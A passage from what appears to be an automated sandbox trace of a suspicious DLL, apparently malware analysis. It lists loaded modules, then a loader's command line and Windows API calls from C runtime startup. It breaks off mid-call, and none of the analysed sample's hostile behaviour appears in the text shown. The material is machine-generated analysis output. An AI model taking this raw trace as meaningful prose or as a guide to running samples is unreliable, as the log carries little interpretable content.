0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2009 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2010 start_va = 0x650000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Thread: id = 94 os_tid = 0xc90 [0034.348] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fa04 | out: lpSystemTimeAsFileTime=0x20fa04*(dwLowDateTime=0xe227bad0, dwHighDateTime=0x1d3dfba)) [0034.348] GetCurrentProcessId () returned 0xc8c [0034.348] GetCurrentThreadId () returned 0xc90 [0034.348] GetTickCount () returned 0x17b75 [0034.348] QueryPerformanceCounter (in: lpPerformanceCount=0x20f9fc | out: lpPerformanceCount=0x20f9fc*=370530128) returned 1 [0034.349] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.349] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0034.349] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0034.349] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0034.349] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0034.349] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.349] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.349] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.349] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.349] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.349] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.350] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.350] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.350] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.350] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.350] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.350] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.374] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.374] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.375] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.375] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.375] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.375] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.375] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.375] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.375] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.375] GetCurrentThreadId () returned 0xc90 [0034.375] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow /fn_args=\"127.0.0.1\"" [0034.375] GetEnvironmentStringsW () returned 0x387908* [0034.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0034.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0xe09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0034.376] FreeEnvironmentStringsW (penv=0x387908) returned 1 [0034.376] GetStartupInfoA (in: lpStartupInfo=0x20f954 | out: lpStartupInfo=0x20f954*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0034.376] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0034.376] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0034.376] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0034.376] SetHandleCount (uNumber=0x20) returned 0x20 [0034.376] GetLastError () returned 0x0 [0034.376] SetLastError (dwErrCode=0x0) [0034.376] GetLastError () returned 0x0 [0034.376] SetLastError (dwErrCode=0x0) [0034.376] GetLastError () returned 0x0 [0034.376] SetLastError (dwErrCode=0x0) [0034.376] GetACP () returned 0x4e4 [0034.376] GetLastError () returned 0x0 [0034.376] SetLastError (dwErrCode=0x0) [0034.376] IsValidCodePage (CodePage=0x4e4) returned 1 [0034.376] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x20f934 | out: lpCPInfo=0x20f934) returned 1 [0034.376] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x20f400 | out: lpCPInfo=0x20f400) returned 1 [0034.376] GetLastError () returned 0x0 [0034.376] SetLastError (dwErrCode=0x0) [0034.376] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x20f390 | out: lpCharType=0x20f390) returned 1 [0034.376] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f814, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.376] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f814, cbMultiByte=256, lpWideCharStr=0x20f178, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.376] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x20f414 | out: lpCharType=0x20f414) returned 1 [0034.376] GetLastError () returned 0x0 [0034.376] SetLastError (dwErrCode=0x0) [0034.376] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0034.376] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f814, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.376] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f814, cbMultiByte=256, lpWideCharStr=0x20f148, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⩁矲狰Ā") returned 256 [0034.376] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⩁矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.377] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⩁矲狰Ā", cchSrc=256, lpDestStr=0x20ef38, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x20f714, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿËhÕôLù ", lpUsedDefaultChar=0x0) returned 256 [0034.377] GetLastError () returned 0x0 [0034.377] SetLastError (dwErrCode=0x0) [0034.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f814, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f814, cbMultiByte=256, lpWideCharStr=0x20f168, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⩁矲狰Ā") returned 256 [0034.377] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⩁矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.377] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⩁矲狰Ā", cchSrc=256, lpDestStr=0x20ef58, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0034.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x20f614, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿËhÕôLù ", lpUsedDefaultChar=0x0) returned 256 [0034.377] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.377] GetLastError () returned 0x0 [0034.377] SetLastError (dwErrCode=0x0) [0034.377] GetLastError () returned 0x0 [0034.377] SetLastError (dwErrCode=0x0) [0034.377] GetLastError () returned 0x0 [0034.377] SetLastError (dwErrCode=0x0) [0034.377] GetLastError () returned 0x0 [0034.377] SetLastError (dwErrCode=0x0) [0034.377] GetLastError () returned 0x0 [0034.377] SetLastError (dwErrCode=0x0) [0034.377] GetLastError () returned 0x0 [0034.377] SetLastError (dwErrCode=0x0) [0034.377] GetLastError () returned 0x0 [0034.377] SetLastError (dwErrCode=0x0) [0034.377] GetLastError () returned 0x0 [0034.377] SetLastError (dwErrCode=0x0) [0034.377] GetLastError () returned 0x0 [0034.377] SetLastError (dwErrCode=0x0) [0034.377] GetLastError () returned 0x0 [0034.377] SetLastError (dwErrCode=0x0) [0034.377] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.378] GetLastError () returned 0x0 [0034.378] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.379] SetLastError (dwErrCode=0x0) [0034.379] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.380] SetLastError (dwErrCode=0x0) [0034.380] GetLastError () returned 0x0 [0034.381] SetLastError (dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.381] SetLastError (dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.381] SetLastError (dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.381] SetLastError (dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.381] SetLastError (dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.381] SetLastError (dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.381] SetLastError (dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.381] SetLastError (dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.381] SetLastError (dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.381] SetLastError (dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.381] SetLastError (dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.381] SetLastError 